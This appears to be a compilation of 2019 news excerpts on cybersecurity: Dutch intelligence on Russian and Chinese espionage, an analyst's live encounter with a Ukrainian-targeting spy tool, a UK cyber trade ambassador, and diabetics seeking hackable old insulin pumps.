Russia and China have intensified their offensive cyber-espionage efforts in the Netherlands, the Dutch domestic intelligence service (AIVD) announced this week in its annual report of 2018. While Chinese cyber spies have sought to steal intellectual property from Dutch targets, the AIVD noted, Russian hackers and propagandists have worked for years to advance the Kremlin’s geopolitical interests by harassing watchdog and government agencies in the Netherlands. These efforts come amid broader foreign influence and offensive cyber campaigns from Russia, China, and Iran that also target the U.S., which the Office of the Director of National Intelligence said are increasing. Russia has focused on everything from spreading disinformation on the downing of Malaysia Airlines Flight 17 — just as Dutch-led investigators pinpointed the attack on Russia — to attempting to hack into the chemical weapons watchdog, the Organization for the Prohibition of Chemical Weapons in 2018, as Russia was under fire for a chemical weapons attack in England.



Foreign Policy

May 1, 2019

The hacker realized that he was being watched. The spy software he was attempting to run against the Ukrainian government had infected the wrong machine, and now an analyst working for an American security company was picking apart the program—known as RatVermin—trying to understand how it worked. The hacker, likely working on behalf of the Luhansk People’s Republic, a breakaway region of Eastern Ukraine, first tried to run a ransomware program dubbed Hidden Tear to scramble the contents of the computer it had mistakenly infected. The program would have made the computer useless to the analyst and flashed a sardonic message: “Files have been encrypted with hidden tear. Send me some bitcoins or kebab. And I also hate night clubs, desserts, being drunk.” But the analyst blocked the program from executing, and then, for a few hours on March 20, 2018, the two engaged in the digital equivalent of hand-to-hand combat. The hacker tried to delete the software being used by the analyst to understand RatVermin, a custom-made all-purpose spy tool. The analyst simply reset the machine and booted RatVermin back up, this time with a question displayed on the screen: Why had the hacker tried to run ransomware on the computer? The hacker replied with a one-word question: “Mad ?”



Infosecurity Magazine

April 30, 2019

The UK government has announced the appointment of a new cybersecurity ambassador to promote the nation’s expertise in the sector to potential export markets. Henry Pearson joins the Department for International Trade (DIT) from previous stints as adviser for GCHQ’s National Cyber Security Centre (NCSC), the Ministry of Defence, and BAE Applied Intelligence’s Detica. He’ll be tasked with working closely with UK cybersecurity businesses looking to sign overseas deals with governments and central banks. According to the DIT, his work will mainly be focused on the Gulf and south-east Asia. “The UK’s reputation for cyber expertise is recognized worldwide and my department is committed to ensuring the UK fulfils its global potential, with cyber exports projected to be worth £2.6bn by 2021,” said international trade secretary Liam Fox, in a statement.



TECHNOLOGY



The Atlantic

April 30, 2019

One day last June, Doug Boss pulled into a police-station parking lot to meet a stranger from Craigslist. His purpose: to buy used insulin pumps. Boss has type 1 diabetes, and he relies on a small pump attached to his body to deliver continuous doses of insulin that keep him alive. To be clear, he didn’t need to buy used medical equipment on Craigslist. Boss, who is 55 and works in IT in Texas, has health insurance. He even has a new, in-warranty pump sitting at home. But he was thrilled to find on Craigslist a coveted old model that was made by the medical-device company Medtronic and discontinued years ago. What makes these outdated Medtronic pumps so desirable is, ironically, a security flaw. Boss was looking for a pump or two he could hack.